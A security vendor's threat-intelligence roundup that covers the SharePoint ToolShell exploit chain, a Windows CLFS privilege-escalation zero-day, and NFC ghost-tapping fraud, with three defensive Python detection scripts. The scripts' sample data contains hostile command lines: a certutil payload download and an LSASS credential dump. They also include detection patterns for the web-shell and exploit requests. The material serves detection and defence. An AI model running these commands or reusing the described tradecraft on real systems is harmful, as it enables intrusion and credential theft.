RSI Security

Cyber Threat Intelligence: SharePoint, Windows Zero-Day, and NFC Fraud


This week’s cyber threat intelligence covers SharePoint ransomware, a Windows zero-day, and NFC mobile wallet fraud.

Staying ahead of rapidly evolving threats requires consistent, actionable cyber threat intelligence. In this week’s roundup, we’re tracking three major attack vectors with growing implications for U.S.-based organizations: a critical SharePoint exploit chain now weaponized for ransomware, a stealthy Windows zero-day enabling RansomExx payloads, and a fast-spreading NFC fraud campaign draining mobile wallets through ghost-tapping techniques.

Let’s break down each threat—and what your security teams need to do next.


ToolShell Exploits in SharePoint Deliver Ransomware at Scale

In this week’s cyber threat intelligence update, on-premises SharePoint servers face an alarming wave of exploitation. The ToolShell exploit chain pairs CVE‑2025‑53770, an unsafe deserialization flaw, with CVE‑2025‑53771, a spoofing flaw, to give unauthenticated attackers arbitrary code execution on SharePoint Server 2016, 2019, and Subscription Edition (SharePoint Online is not affected). Because the chain needs no credentials at all, front-end controls such as MFA or single sign-on never come into play. Attackers have also used the foothold to steal the server’s ASP.NET MachineKey material, which lets them forge trusted __VIEWSTATE payloads and regain code execution even after the patch is applied unless the keys are rotated.

Security researchers have confirmed that the chain was exploited as a zero-day against hundreds of servers worldwide, with at least 400 confirmed victims, including U.S. federal institutions such as NIH and DHS, and broader exposure suspected across the financial, healthcare, and energy sectors. Ransomware families including Warlock and 4L4MD4R have been observed using ToolShell access to deploy their payloads post-exploitation.

CISA has added CVE‑2025‑53770 to its Known Exploited Vulnerabilities Catalog, which obligates federal agencies to remediate it on an accelerated timeline. Recommended mitigations: apply the July 2025 security updates; rotate the ASP.NET MachineKey material after patching (a key stolen before the patch still lets an attacker forge signed requests; Microsoft’s guidance uses the Update-SPMachineKey cmdlet or Central Administration) and restart IIS; enable AMSI integration with Defender Antivirus or an equivalent product on every SharePoint front end; isolate internet-facing servers that cannot be patched immediately; and hunt for web shells such as spinstall0.aspx in the LAYOUTS directories and for the exploit’s signature in IIS logs (a POST to /_layouts/15/ToolPane.aspx with a Referer of /_layouts/SignOut.aspx). Analysts warn that delay risks persistent access and lateral movement within critical networks.
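As an added, illustrative example (not code from RSI Security, Microsoft, or CISA), the following Python script parses an IIS W3C log and flags the two indicators described above: the exploit request (a POST to /_layouts/15/ToolPane.aspx in edit mode whose Referer is /_layouts/SignOut.aspx) and any request for the spinstall0.aspx web shell. The log lines are constructed sample data, the hostnames and IPs are placeholders, and the wildcard on the web shell name is an assumption made to catch renamed copies:

```python
import re

# Constructed IIS W3C log excerpt from a SharePoint front end (sample data, not a real capture).
# Column order is taken from the #Fields header, exactly as IIS writes it.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-19 12:01:04 10.0.0.5 GET /_layouts/15/start.aspx - 443 CONTOSO\\jdoe 10.0.0.20 Mozilla/5.0 - 200
2025-07-19 12:02:11 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 Mozilla/5.0 https://sp.contoso.example/_layouts/SignOut.aspx 200
2025-07-19 12:02:13 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200
2025-07-19 12:05:30 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CONTOSO\\admin 10.0.0.21 Mozilla/5.0 https://sp.contoso.example/_layouts/15/settings.aspx 200
"""

# Exploit signature: POST to ToolPane.aspx in edit mode with a Referer of SignOut.aspx.
TOOLPANE = re.compile(r"/_layouts/(?:1[56]/)?toolpane\.aspx$", re.I)
SIGNOUT = re.compile(r"/_layouts/(?:1[56]/)?signout\.aspx", re.I)
# spinstall0.aspx plus renamed siblings; the suffix wildcard is an assumption, not a published IOC.
WEBSHELL = re.compile(r"/spinstall\w*\.aspx$", re.I)


def parse_iis(text):
    """Turn W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # header can change mid-file; honor the latest one
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()                  # IIS encodes spaces inside a field as '+', so split is safe
        if fields is None or len(values) != len(fields):
            continue                           # skip malformed lines rather than mis-align columns
        rows.append(dict(zip(fields, values)))
    return rows


def triage(rows):
    """Return one finding per row that matches a ToolShell indicator."""
    findings = []
    for r in rows:
        stem = r.get("cs-uri-stem", "")
        query = r.get("cs-uri-query", "-").lower()
        referer = r.get("cs(Referer)", "-")
        if (r.get("cs-method", "").upper() == "POST" and TOOLPANE.search(stem)
                and "displaymode=edit" in query and SIGNOUT.search(referer)):
            findings.append({"rule": "toolshell-exploit-attempt", "c-ip": r["c-ip"],
                             "time": r["time"], "status": r["sc-status"]})
        if WEBSHELL.search(stem):
            findings.append({"rule": "webshell-access", "c-ip": r["c-ip"],
                             "time": r["time"], "status": r["sc-status"]})
    return findings


def suspicious_sources(findings):
    """Distinct client IPs to isolate and investigate; any hit, not only HTTP 200s, is worth a look."""
    return sorted({f["c-ip"] for f in findings})


if __name__ == "__main__":
    hits = triage(parse_iis(SAMPLE_LOG))
    for h in hits:
        print(f"{h['time']} {h['c-ip']} {h['rule']} (HTTP {h['status']})")
    print("isolate/investigate:", suspicious_sources(hits))
```

Run it against the real logs under %SystemDrive%\inetpub\logs\LogFiles\W3SVC*\ on each front end. A matching request dated before the patch was applied is grounds to rotate the MachineKey and treat the host as compromised regardless of the HTTP status returned, since a failed-looking request can still precede a successful one.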


Windows CLFS Zero‑Day Enables PipeMagic and RansomExx Attacks

Another pressing concern in this week’s cyber threat intelligence report is CVE‑2025‑29824, a privilege escalation flaw in the Windows Common Log File System (CLFS) kernel driver, fixed in the April 2025 Patch Tuesday release. Microsoft confirmed active exploitation by the threat group Storm‑2460, which pairs the exploit with a modular backdoor called PipeMagic. Once the exploit runs, the attacker holds SYSTEM privileges, which is enough to dump LSASS for credentials and to stage a ransomware payload.

Notably, the intrusions rely on living-off-the-land binaries such as MSBuild (to load and execute the encrypted backdoor in memory) and certutil (to download files), and PipeMagic uses randomly named pipes to pass payloads between its loader and backdoor components. Some variants load payloads from Azure-hosted domains via a C# loader delivered as a file named metafile.mshi. Reported victims span IT, real estate, financial services, and retail organizations in the U.S., Saudi Arabia, Spain, and Venezuela.

Patching closes the privilege escalation path, but it does not evict an attacker who exploited the flaw before the April update shipped, so environments that were exposed in that window still need a compromise assessment. Behavioral monitoring is the practical control: flag MSBuild launched from a shell or pointed at a project file in a user-writable directory, certutil used to download or decode files, named-pipe creation by unexpected processes, and any process that targets LSASS with dump-style arguments. Microsoft Defender XDR or a comparable EDR can also detect the token manipulation this exploit performs (it calls RtlSetAllBits to turn on every privilege in the process token), an artifact worth alerting on in its own right. Catching these behaviors early sharply reduces dwell time.
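The behavioral rules above, as an added example that is not part of the original post or of any vendor’s detection content: the Python below scores constructed Sysmon-style process-creation (event ID 1) and named-pipe (event ID 17) records against four heuristics drawn from the reported tradecraft and escalates a host only when two or more independent behaviors fire. Field names, file paths, shell-parent list, and the pipe-name length threshold are assumptions; the RtlSetAllBits token write happens in kernel context and is left to the EDR sensor, so it is not modeled here.

```python
import ntpath
import re
from collections import defaultdict

# Constructed Sysmon-style telemetry (sample data, not events from the incidents above).
# id 1 = process creation, id 17 = named pipe created. Paths and hostnames are placeholders.
EVENTS = [
    {"id": 1, "host": "ws01", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"MSBuild.exe C:\Users\Public\build.xml"},
    {"id": 1, "host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -urlcache -split -f https://cdn.example/installer.bin C:\\Users\\Public\\installer.bin"},
    {"id": 1, "host": "ws01", "image": r"C:\Users\Public\dllhost.exe",       # renamed dumping tool (assumed)
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"dllhost.exe -accepteula -ma lsass.exe C:\Users\Public\l.dmp"},
    {"id": 17, "host": "ws01", "image": r"C:\Users\Public\dllhost.exe", "pipe": r"\1.3f7a9c0de1b2456789abcdef01234567"},
    {"id": 1, "host": "build02", "image": r"C:\Program Files\Microsoft Visual Studio\2022\Professional\MSBuild\Current\Bin\MSBuild.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\devenv.exe",
     "cmdline": r"MSBuild.exe D:\src\app\app.csproj /t:Build"},
    {"id": 17, "host": "build02", "image": r"C:\Windows\System32\svchost.exe", "pipe": r"\lsass"},
]

SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "explorer.exe"}
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\programdata\\", "\\temp\\", "\\tmp\\")
# Pipe name pattern reported for PipeMagic: "1." followed by a hex string. The minimum length is an assumption.
PIPEMAGIC_PIPE = re.compile(r"\\?1\.[0-9a-f]{16,}$", re.I)


def name(path):
    """Lower-cased file name from a Windows path, independent of the OS this runs on."""
    return ntpath.basename(path).lower()


def classify(ev):
    """Return the detection rule an event trips, or None."""
    if ev["id"] == 1:
        img, parent, cmd = name(ev["image"]), name(ev.get("parent", "")), ev.get("cmdline", "").lower()
        if img == "msbuild.exe" and (parent in SHELL_PARENTS or any(p in cmd for p in USER_WRITABLE)):
            return "msbuild-lolbin"         # inline-task loader rather than an IDE or CI build
        if img == "certutil.exe" and any(f in cmd for f in ("-urlcache", "-decode", "-encode")):
            return "certutil-download"      # download cradle or payload decoding
        if "lsass" in cmd and any(f in cmd for f in ("-ma", "minidump", "comsvcs")):
            return "lsass-dump"             # dump-style arguments, whatever the (possibly renamed) image
    elif ev["id"] == 17 and PIPEMAGIC_PIPE.search(ev.get("pipe", "")):
        return "pipemagic-pipe"
    return None


def correlate(events):
    """Collect the distinct rules tripped on each host."""
    per_host = defaultdict(set)
    for ev in events:
        rule = classify(ev)
        if rule:
            per_host[ev["host"]].add(rule)
    return {h: sorted(r) for h, r in per_host.items()}


def escalate(per_host, min_rules=2):
    """Hosts where at least min_rules independent behaviors fired; one LOLBin alone is usually noise."""
    return sorted(h for h, rules in per_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = correlate(EVENTS)
    for host in sorted(found):
        print(host, found[host])
    print("escalate:", escalate(found))
```

The correlation step is what makes this usable: MSBuild and certutil each have legitimate uses, but a host on which a shell-spawned MSBuild, a certutil download, an LSASS dump, and a PipeMagic-style pipe all appear within one window is the chain described above, not developer activity.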


Ghost‑Tapping: Mobile Wallet Fraud Goes Physical

The latest cyber threat intelligence spotlight also highlights a growing NFC fraud method known as ghost-tapping. Criminals load stolen card credentials into mobile wallets such as Apple Pay and Google Pay on devices they control, then use NFC relay tooling (such as the open-source NFCGate) to forward the wallet’s contactless transaction to a mule’s phone held against a point-of-sale terminal. The fraudulent purchase happens in person while the wallet itself never leaves the operator’s hands.

ThreatFabric and Recorded Future researchers have exposed syndicates, often Chinese-speaking, that advertise ghost-tapping services via Telegram. These groups run farms of Android devices that relay card data to payment terminals in real time, enabling large-scale, anonymous retail fraud. Although many early cases surfaced in Southeast Asia, the trend is highly relevant to the U.S., where mobile wallet adoption is widespread and American consumers, merchants, and processors are natural targets. Financial institutions, retail chains, and payment processors must adapt quickly.

Effective detection relies on real-time transaction analytics that flag impossible device pairings (the same wallet token tapping at terminals too far apart for the elapsed time), unusual tap cadence (bursts of card-present purchases within minutes), and recently enrolled wallet credentials that immediately begin transacting in person. Combining these signals with device and behavioral metadata under adaptive rules lets issuers and processors block suspicious NFC activity before losses accumulate.
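The analytics just described, as an added example rather than anything from ThreatFabric, Recorded Future, or RSI Security: the Python below runs three rules over constructed wallet-token transactions (impossible travel between terminals, a burst of card-present taps, and in-person use shortly after enrollment) and blocks a token when at least two of them agree. Terminal coordinates, timestamps, and every threshold (900 km/h, 3 taps in 10 minutes, 24 hours) are illustrative assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from math import asin, cos, radians, sin, sqrt


def ts(s):
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Constructed sample data (not real transactions). All times are UTC.
ENROLLMENTS = {  # wallet token -> time the card was provisioned into a mobile wallet
    "tok-1": ts("2025-08-01T08:00"),
    "tok-2": ts("2025-02-14T12:00"),
}
TAPS = [  # card-present NFC purchases: (token, terminal, lat, lon, time, amount)
    ("tok-1", "term-BKK-1", 13.7563, 100.5018, ts("2025-08-01T09:00"), 480.00),
    ("tok-1", "term-BKK-2", 13.7563, 100.5018, ts("2025-08-01T09:03"), 515.00),
    ("tok-1", "term-BKK-3", 13.7563, 100.5018, ts("2025-08-01T09:06"), 499.00),
    ("tok-1", "term-NYC-1", 40.7128, -74.0060, ts("2025-08-01T09:30"), 320.00),
    ("tok-2", "term-SEA-1", 47.6062, -122.3321, ts("2025-08-01T10:00"), 12.50),
    ("tok-2", "term-PDX-1", 45.5152, -122.6784, ts("2025-08-01T18:00"), 41.00),
]

EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two terminals in kilometres."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi, dlmb = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def analyze(taps, enrollments, max_kmh=900.0, burst_n=3,
            burst_window=timedelta(minutes=10), fresh_window=timedelta(hours=24)):
    """Return {token: sorted list of rules tripped}. Thresholds are illustrative assumptions."""
    by_token = defaultdict(list)
    for tap in sorted(taps, key=lambda t: t[4]):
        by_token[tap[0]].append(tap)
    alerts = defaultdict(set)
    for token, rows in by_token.items():
        # Impossible travel: one wallet token cannot physically tap at two distant terminals this fast.
        for prev, cur in zip(rows, rows[1:]):
            km = haversine_km(prev[2], prev[3], cur[2], cur[3])
            hours = (cur[4] - prev[4]).total_seconds() / 3600.0
            if km > 1.0 and (hours == 0 or km / hours > max_kmh):
                alerts[token].add("impossible-travel")
        # Tap burst: burst_n or more card-present purchases inside burst_window.
        for i in range(len(rows)):
            j = i
            while j < len(rows) and rows[j][4] - rows[i][4] <= burst_window:
                j += 1
            if j - i >= burst_n:
                alerts[token].add("tap-burst")
                break
        # Fresh enrollment: the token began transacting in person soon after provisioning.
        enrolled = enrollments.get(token)
        if enrolled is not None and rows[0][4] - enrolled <= fresh_window:
            alerts[token].add("fresh-enrollment")
    return {t: sorted(r) for t, r in alerts.items()}


def should_block(alerts, token, min_rules=2):
    """Decline further taps when at least min_rules independent signals agree (tunable per issuer)."""
    return len(alerts.get(token, [])) >= min_rules


if __name__ == "__main__":
    found = analyze(TAPS, ENROLLMENTS)
    for token in sorted(found):
        print(token, found[token], "BLOCK" if should_block(found, token) else "review")
```

Each rule is weak on its own (a traveller can legitimately enroll a card and use it the same day), which is why the decision requires two independent signals; in production the thresholds would be tuned per issuer and fed with device metadata such as the enrolling handset’s attestation state.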


Modern Threats: Cyber Intelligence in Action

Taken together, these three threat vectors show the complex nature of modern cyber threats. They range from remote code execution in critical platforms to stealthy privilege escalation and hands-on fraud. In response, current cyber threat intelligence helps security teams act fast. It empowers them to prioritize patching, sharpen detection logic, and strengthen prevention across systems and user touchpoints.

That’s why RSI Security turns threat intelligence into defensible action steps. This includes proactive assessments and endpoint behavioral monitoring. We also deliver mobile security enhancements tailored to today’s evolving digital risks.

Ready to fortify your cyber threat defenses?
Explore our Cybersecurity Services or connect with our team for a threat intelligence consultation:

